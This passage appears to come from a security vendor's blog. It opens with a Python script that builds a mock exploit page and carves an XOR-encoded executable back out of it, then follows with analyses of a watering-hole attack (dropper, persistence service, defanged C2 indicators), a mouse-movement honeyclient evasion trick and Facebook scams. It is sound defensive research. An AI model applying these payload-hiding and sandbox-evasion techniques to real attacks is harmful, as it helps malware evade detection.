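def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def build_exploit_page(exe: bytes, key: int = KNOWN_KEY) -> bytes:
    """Constructed exploit.html look-alike: marker, then the XORed bytes as hex,
    inside a JavaScript variable, plus the iframe to the exploit page.
    (Hex encoding is an assumption; the post does not show the real encoding.)"""
    return (b'<html><script>var d="' + MARKER + xor_bytes(exe, key).hex().encode("ascii")
            + b'";</script><iframe src="Protect.html"></iframe></html>')


def extract_marked_stream(page: bytes) -> Optional[bytes]:
    """What the shellcode does in memory, done on the file: find the marker and
    take the stream that follows it."""
    i = page.find(MARKER)
    if i < 0:
        return None
    m = HEX_RUN.match(page, i + len(MARKER))
    if not m or len(m.group(0)) % 2:
        return None
    return bytes.fromhex(m.group(0).decode("ascii"))


def recover_key(stream: bytes) -> Optional[int]:
    """Single-byte XOR key recovery from the known 'MZ' plaintext header."""
    for key in range(256):
        if xor_bytes(stream[:2], key) == b"MZ":
            return key
    return None


def carve_executable(page: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (key, decoded executable) or None if no marked stream is found."""
    stream = extract_marked_stream(page)
    if stream is None:
        return None
    key = recover_key(stream)
    if key is None:
        return None
    return key, xor_bytes(stream, key)


if __name__ == "__main__":
    result = carve_executable(build_exploit_page(FAKE_EXE))
    if result is not None:
        key, exe = result
        print("key=0x%02x size=%d header=%r" % (key, len(exe), exe[:2]))
```

On a real sample, hash the carved output and compare it with the dw20.exe MD5 given below before doing anything else with it; if the key recovery returns None, the encoding after the marker differs from the hex assumption made here and extract_marked_stream is the function to adapt.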


The executed file dw20.exe (MD5: d2354e9ce69985c1f55dbad2837099b8) acts as a dropper and has the same name as the file dropped in the Rotary domains attack. The threat stays persistent on the system by dropping another file, startup.dll (MD5: 4e1e2b9cd6b5bca2b1b935ddc97f2d7a), into the Windows directory and registering it as an auto-started service called WindowsUpdata. Check out this complete report from ThreatScope™. The backdoor service is actually installed under a registry key called “RAT”, which is not very discreet, to say the least, and the backdoor connects to a C2 that is recognized by our service as suspicious: hxxp://interfacet.oicp.net:88. It appears that oicp.net is a web host located in China. Custom hosts on the site have been found to be involved in targeted attacks in the past (1 2); however, this specific host actually points to the IP address 65.19.141.203, located in Fremont, California, United States. Looking closer at this IP address, we could see that it hosts a lot of mayhem, including many other *.oicp.net host names that we have already classified in a security category:


One of the most interesting parts is that the IP address to which the C2 points is in an address range that belongs to Hurricane Electric, a US-based internet service provider that got some headlines lately for being the first Internet backbone to connect to 2,000 IPv6 networks. An interesting article from ‘The Droid Tech Guy’ illustrates how, although web traffic in China is very restricted and censored, its architecture is actually one of the most advanced. According to the article, one of its advances is that it employs a security feature known as Source Address Validation Architecture (SAVA). To quote from the article: “This feature puts security checkpoints throughout the system and then builds up a database very systematically. This database will contain trusted computers and their IP addresses. This system will then authenticate who is sending what. This way, the possibility of sending malicious data becomes a lot more difficult, nearly impossible, like many say.”


      This is a good point that makes us ponder – could it be that threats that originate from China are actually safer, from the attacker’s perspective, if hosted outside of China? That may well be the case. 


In summary, we had a look at a high-profile, government-related website that was compromised in a ‘watering hole’ attack employing some interesting techniques. Targeted attacks now seem to surface regularly and more frequently, with new attacks exposed almost on a weekly basis. Such rapid discoveries may cause the players behind state-sponsored attacks or other miscreant groups to increase their level of sophistication. However, we believe that the sophistication of such attacks depends directly on the protection level employed by the target. If defense levels are mediocre or “just enough,” then attackers will probably do just that much to get past them. The tough questions one should ask oneself in today’s threat landscape are “what am I doing to not be the next victim?” and, even more importantly, “what am I going to do when I do become one?”. We believe that post-infection mitigation plans should be given the same emphasis as prevention and putting adequate protection in place.


      Websense Protection


Websense customers are protected from this and other threats by Websense ACE (Advanced Classification Engine). ACE protected against this threat in real time and against the different stages of the attack progression, also known as the “kill chain”. More information about the 7 stages of advanced threats can be found at the next link. Here is a recap of how ACE protected against the different stages:


Lure stage: protection confirmed. The lure is the first stage of the attack, and in this case it was the URLs that loaded a malicious Flash file:

      hxxp://www.ict.org.il/js/1.html -> Flash file loader (AceInsight report)

      hxxp://www.herzliyaconference.org/_modules/80.html -> Flash file loader (AceInsight report)


Dropper stage: not applicable. The dropper stage is where a file passes through the gateway and is inspected in real time; it does not apply to this attack because the file was hidden and obfuscated in memory and reconstructed on the client side, a typical sandbox evasion technique.


Calling home stage: protection confirmed. The calling-home stage is the connection the malware makes to its destination after it has been successfully installed on the victim’s machine. In this attack the malware initiated a connection to a destination that is already known to us, hxxp://interfacet.oicp.net:88 (AceInsight report).


      For participation in data analysis, special thanks to: Gianluca Giuliani

      Honeyclient Evasion Techniques, Bible.org Case

      Hot on the heels of the NBC.com hack last week, Websense® Security Labs™ researchers were alerted by SANS to another high profile website compromise on Friday: bible.org. It appears that the offending code has now been removed from the bible.org website.  


At first glance, this seemed to be a run-of-the-mill “compromise, redirect, exploit” chain; however, closer analysis revealed the use of an interesting honeyclient evasion technique. Honeyclients allow the profiling of websites in a heuristic and automated way. Testing a website with a honeyclient usually takes longer than signature-based solutions, but the results are much more accurate, especially when new zero-day code or a new emerging threat needs to be flagged and requires scrutiny. Honeyclients usually run on top of virtual machine sandboxes; evasion techniques make malicious code more aware of its running environment, checking whether it is in a virtual environment, or likely to be an ‘analysis’ environment, before actually running the malicious code.


This snippet of code is the entirety of the honeyclient evasion attempt: as the method name suggests, the function ‘jsstatic’ is only called once the event handler registers movement of the user’s mouse over the document (page). A primitive honeyclient obviously has no mouse-movement emulation, so the offending function that leads to the exploit code is never called, and the honeyclient never alerts on it.


Let’s take a closer look at the jsstatic function:


The first part of this function definition is simply a sentry variable that stops the function from being executed again on every new onmousemove event; the global variable astatf is set to 0 earlier in the script. The next part simply creates the iframe, which is then executed as if it had just been injected into the page, as in a normal compromise.


This technique is quite primitive and shows that this kind of honeyclient evasion is still in its infancy. The plethora of event handling methods available means the technique is not going to go away anytime soon, and it is likely only going to get more complex and inventive.


In summary: the use of such techniques ultimately helps malicious code remain undetected for longer periods of time and thus increases its chances of bypassing security products. The technique described in this blog is simple and allows redirection to exploits only if a mouse movement is detected, an action that is usually associated with an actual person interacting with a website and that primitive honeyclients often do not emulate. Why are the attackers using this technique instead of the normal drive-by technique we usually see? Probably because they wanted to make the attack stealthier, as attacks like this would not be picked up by automated behavioral analysis systems. That is why multiple layers of defense are needed against web-based attacks.


This discovery ties in to Websense Security Labs predictions that cybercriminals will become more ‘virtually aware’ and find modern bypass methods to avoid security detection – see our Websense 2013 Security Predictions.


      Author: Darrel Rendell 

      ‘Jacked Frost’ Facebook Scam Goes Wild and Doubles Over the Weekend

Last week we wrote a blog about a specific Facebook scam that appeared to spread rather aggressively. We have decided to nickname the scam “Jacked frost”. The Websense® ThreatSeeker™ network detected that the scam increased and multiplied over the weekend, particularly on Saturday, when we saw the number of unique URLs related to this scam double. This shows how cyber crooks time their attacks for periods when users are more laid back and the security community is less likely to alert users to this type of threat.



      Christmas-Themed Facebook Scams: How Cybercrooks Kick it up a Notch and Piggyback on Big Brands


      From time to time the Websense® ThreatSeeker™ Network detects high volume surges of badness rolling across Facebook. In the past 48 hours we’ve seen a rapid increase of a particular scam campaign that has aggressively spread through the world’s largest social networking site. 


      With the holiday shopping season here, it appears that cyber crooks are going full throttle to attract Christmas shoppers by piggybacking on the reputation of well-known brands like Walmart, Asda, Visa, Best Buy, Apple, and more. In the attack that we’re about to describe, it appears that user accounts belonging to the free DNS service freedns.afraid.org were compromised and used as part of the cyber criminals’ scam infrastructure. Read on for details.

